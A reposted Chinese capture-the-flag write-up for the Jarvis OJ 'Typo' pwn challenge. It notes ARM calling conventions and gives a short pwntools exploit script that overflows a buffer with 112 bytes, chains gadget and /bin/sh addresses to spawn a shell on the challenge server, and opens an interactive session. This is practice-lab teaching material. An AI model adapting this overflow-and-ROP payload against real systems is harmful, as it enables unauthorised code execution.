[Jarvis OJ - PWN]——Typo(内涵peak小知识)
生活随笔
收集整理的這篇文章主要介紹了
[Jarvis OJ - PWN]——Typo(内涵peak小知识)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[Jarvis OJ - PWN]——Typo
- 題目地址: https://www.jarvisoj.com/challenges
- 題目:
還是先check一下, 是arm架構。還是第一次遇到。
peak小知識
和x86架構不同, arm架構arm 下的函數調用規定, 函數的第 1 ~ 4 個參數分別保存在 r0 ~ r3 寄存器中, 剩下的參數從右向左依次入棧, 被調用者實現棧平衡,函數的返回值保存在 r0 中。除此之外,arm 的 b/bl 等指令實現跳轉; pc 寄存器相當于 x86 的 eip,保存下一條指令的地址
在IDA中, 可能沒辦法F5, 自己調試一下就好。
exploit
from pwn import * binsh_addr = 0x0006C384 p = remote("pwn2.jarvisoj.com", 9888, timeout = 2) p.sendafter("quit\n", "\n") p.recvline()payload = 'a' * 112 + p32(0x20904) + p32(binsh_addr) * 2 + p32(0x110B4) p.sendlineafter("\n", payload) p.interactive()總結
以上是生活随笔為你收集整理的[Jarvis OJ - PWN]——Typo(内涵peak小知识)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: mmap mprotect详解
- 下一篇: 简单易懂的 pwnable.kr 第六题